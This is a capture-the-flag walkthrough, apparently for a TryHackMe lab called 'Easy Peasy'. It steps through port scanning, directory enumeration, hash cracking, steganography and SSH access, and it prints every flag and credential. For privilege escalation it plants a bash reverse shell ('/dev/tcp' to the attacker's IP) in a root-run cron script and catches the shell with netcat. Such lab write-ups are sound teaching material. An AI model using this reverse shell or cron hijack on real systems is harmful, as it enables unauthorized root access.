Easy Peasy Walkthrough

Let’s start doing another easy Machine, which is Easy Peasy. You can access the machine from here.

First, Like always, we start by scanning the ports Along with services and their version on the machine by using Nmap, By using the following command.

nmap -sC -sV Machine_IP

You should get Something similar to the following:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-08 14:04 EDT
Nmap scan report for 10.10.238.226
Host is up (0.31s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.37 seconds

From the scan we can see the server has the following services running:

• HTTP Nginx Service 1.16.1 , on port 80 which means the machine is accessible via HTTP protocol, where you can access it via a browser.

But, If we tried to answer the first question of “how many ports running” which is 1, we will get a wrong answer, also question 3 gives a hint that there is a higher port number.

So we run, Nmap again to scan all ports on the machine, we can do that buy using the following command:

nmap  10.10.238.226 -p- -v

so the other service running are

• http service running on apache 2.4.43
• and SSH service running on port 6498 with openSSH 7.6p1

So the first question will have the answer:

3 ports

The version of nginx is:

1.16.1

and what’s running on the highest port is:

Apache

Now, we finished with the first part, the second part is about enumerating and compromising the machine.

First, if we access the machine on the browser on both ports 80 and 65524 we can see the default pages for both Nginx and apache, so for now, there won’t benefit us too much.

Let’s start enumerating the service running on port 80 for any hidden directories or files by using GoBuster

gobuster dir --url http://Machine_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

After the scan finishes ( you can run it for 15 mins, it’s more than enough for this machine) you can see the following directories being discovered

/hidden (Status: 301)

If we access the directory, you should get the following website

Let’s check the page source. we can see that there isn’t anything useful in the source, so let’s do another enumeration on the /hidden page by running:

gobuster dir --url http://Machine_IP/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

After the scan finishes ( you can run it for 15 mins, it’s more than enough too for this machine) you can see the following directories being discovered

/whatever (Status: 301)

let’s access the page, we get a blank page. But, if we access the source code, we get the following hidden p tag

<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>

This is base64 encoding, so let’s decode the message via any website, and we get the first flag.

flag{f1rs7_fl4g}

You can try to enumerate anything inside /whatever , but nothing will show up, so let’s go to the other service running on port 65524

we will run the same command, But we will add the new port number.

gobuster dir --url http://Machine_ip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

You can keep GoBuster running for 20 mins , I got nothing, so I turned it off, now we need to try to see other information

Usually, any website will have few known files that we can search in, one of them is robots.txt which is a file responsible of bots that crawl the site such as googlebot to put the site on google search.

Let’s try to access the robots.txt file from the browser

http://Machine_ip:65524/robots.txt

we can see that we get the following the page, where it says only the flag can enter

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

Now we know our flag is either encoded or hashed, by looking at the text, we can see the minimal value is 0 and max is E, so we can say that this might be a hexadecimal value, where hexadecimal values are ranged between 0->F ( 0 to 9 then A to F).

If we search online for a tool to convert hexadecimal to string, and decoded it, we will get rubbish value, then let’s go to the other option, which is a hashed value. This is md5 hash because it has 32 hexadecimal character ( you can count them if you want)

A simple search on google will give you the decoded value, which is:

flag{1m_s3c0nd_fl4g}

So, Now for the third flag, which is supposed to be in a file called easypeasy.txt, if we tried to access that page as http://machine ip:65524/easypeasy.txt or with different extensions, we won’t find the file. Also, we have already scanned the server with gobuster and we didn’t find anything, another place is the source code of the page.

so if we open the page source in our browser and read the document, we will see the following line:

<li>
They are activated by symlinking available
configuration files from their respective
Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}
*-available/ counterparts. These should be managed
by using our helpers

and there goes our third flag.

flag{9fdafbd64c47471a8f54cd3fc64cd312}

Now, the flag is md5 hash same as the one before, let’s try to google that.

We get the word “candeger” , when we try to use it, it’ll give us the wrong answer, so let’s go back again to our source code and check for any other clues.

just like before, you will find a hidden p tag, with the value

ObsJmP173N2X6dOrAgEAL0Vu

Let’s try different decoding techniques, you will find that it’s decoded using base62 which gives the following directory

/n0th1ng3ls3m4tt3r

now let’s try to access the directory, it will give us an image with matrix style without any hints, let’s try to access the page source code.

we will see the following encoded string

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

let’s try to check the hexadecimal value, we will get some random rubbish data.

Which means it’s probably a hashed password (tryhackme already gave the hint that it’s a hash of a password) , so let’s try to analyse the hash using the following website.

If you still don’t know the different of hashes, this site will help you a lot, so after we got the type which is SHA2, time to crack it using john the ripper tool.

we will use the password list that they gave us already, so let’s run the command

john sha2pass --wordlist=txt

and you will get the answer, which is

mypasswordforthatjob

So now, we need to find a username and a password to continue solving the machine, But, there’s no more information in page source nor hidden directories which means the information is hidden somewhere else.

Where ?! The images !!, so far we have neglected these, but now, maybe there’s information hiding inside of them using steganography technique.

Let’s try solving the second image, since it’s probably opened in your browser right now.

First, let’s download the image, then we use a tool called steghide where it helps to hide and discover files hidden inside an image.

we use “–extract” flag to extract any data inside along with “-sf” to select a file, which is our image

steghide --extract -sf binarycodepixabay.jpg 

then we will put the password we obtained in the previous step, and you should get the success message

wrote extracted data to "secrettext.txt".

now, let’s open the file with our cat command

cat secrettext.txt 

wonderful , we will get our username that we’ve been looking for, along with the password being in binary mode.

username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

after we decode the password to ASCII, we will get the following result

iconvertedmypasswordtobinary

and now, let’s login to SSH with the credentials we have and don’t forget to change the port to 6498 (by using -p)

after we login, we can see the file user.txt, and when we print, we get the following message

User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}

so, we know the flag is rotated, to get which rotation is used, we take the first word “synt”, because we already know that it’s supposed to be “flag” and if we counted how many letters we will get which rotation is used which is ROT13

aaaand we get our flag

flag{n0wits33msn0rm4l}

now, it’s time to escalate our privileges to get the access to root account, let’s start by running the following find command that will search for services we can use to get the sudo permission.

find / -perm -u=s -type f 2>/dev/null

You should get the following programs

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/pppd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/bin/ping
/bin/mount
/bin/fusermount
/bin/su
/bin/umount

and now to the lovely gtfobins to see how we can get the sudo shell by using one of the above programs.

First, we see pkexec, which allows us to run the shell as root, but when we try it, it will require a root password, and we don’t have access to the shadow file, so that’s a dead end.

boring@kral4-PC:~$ pkexec "/bin/sh"
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/bin/sh' as the super user
Authenticating as: root
Password: 
polkit-agent-helper-1: pam_authenticate failed: Authentication failure
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
This incident has been reported.

I’ve tried to research for the others but some didn’t work and others were just too old to be used.

But then, we have a service running when you logged in, that gave you the following message

You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!

which is handled by something called crontab, so let’s see this file.

let’s see the owner and permissions for crontab

ls -la /etc/crontab

you will get the following result

-rw-r--r-- 1 root root 792 Jun 15  2020 /etc/crontab

so the file is owned by the root, but we don’t have writing permission on it, but let’s see what does it execute.

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

so it executes the following files

• /etc/cron.hourly
• /etc/cron.daily
• /etc/cron.weekly
• /etc/cron.monthly
• .mysecretcronjob.sh

now, the first 4 won’t be much useful to us, because they run on hourly, daily, weekly and monthly frequency, and we won’t edit anything inside them then wait for an hour to be executed, so let’s check the last option which will run every single minute

so let’s check the permissions for the last file by running

ls -la /var/www/.mysecretcronjob.sh 

and voila!!

-rwxr-xr-x 1 boring boring 33 Jun 14  2020 /var/www/.mysecretcronjob.sh

the file is owned by our user, so we can edit it.

let’s access the file by nano or whichever text editor you prefer.

now here, we need to add a script that gives us the root shell, By using a technique called reverse shell, where we let the target connect to us and give us the access to their machine instead of us connecting to them ( because we don’t know the root password, just like this case)

there are many reverse shells written in different languages that you can check them from pentestmonkey

let’s use the bash reverse shell, we need to change the IP to our machine IP and change the port or keep it as long as it’s doesn’t conflict with any service running on your device.

bash -i >& /dev/tcp/your_IP/your_port 0>&1

and now save the file, open a new terminal windows/tab in your machine, and start a listener using netcat tool by running the following command

nc -lvp your_port

and Boom !!!, you should get access to the root shell

root@kral4-PC:/var/www# 

so let’s go back to home directly and list all files including hidden ones by running

ls -la

you should get the following result, including the root.txt flag

drwx------  5 root root 4096 Jun 15  2020 .
drwxr-xr-x 23 root root 4096 Jun 15  2020 ..
-rw-------  1 root root    2 May  8 21:23 .bash_history
-rw-r--r--  1 root root 3136 Jun 15  2020 .bashrc
drwx------  2 root root 4096 Jun 13  2020 .cache
drwx------  3 root root 4096 Jun 13  2020 .gnupg
drwxr-xr-x  3 root root 4096 Jun 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   39 Jun 15  2020 .root.txt
-rw-r--r--  1 root root   66 Jun 14  2020 .selected_editor

so let’s open the file and read the flag, and you will have the last flag for this machine.

flag{63a9f0ea7bb98050796b649e85481845}

And congrats , that was a easy peasy machine.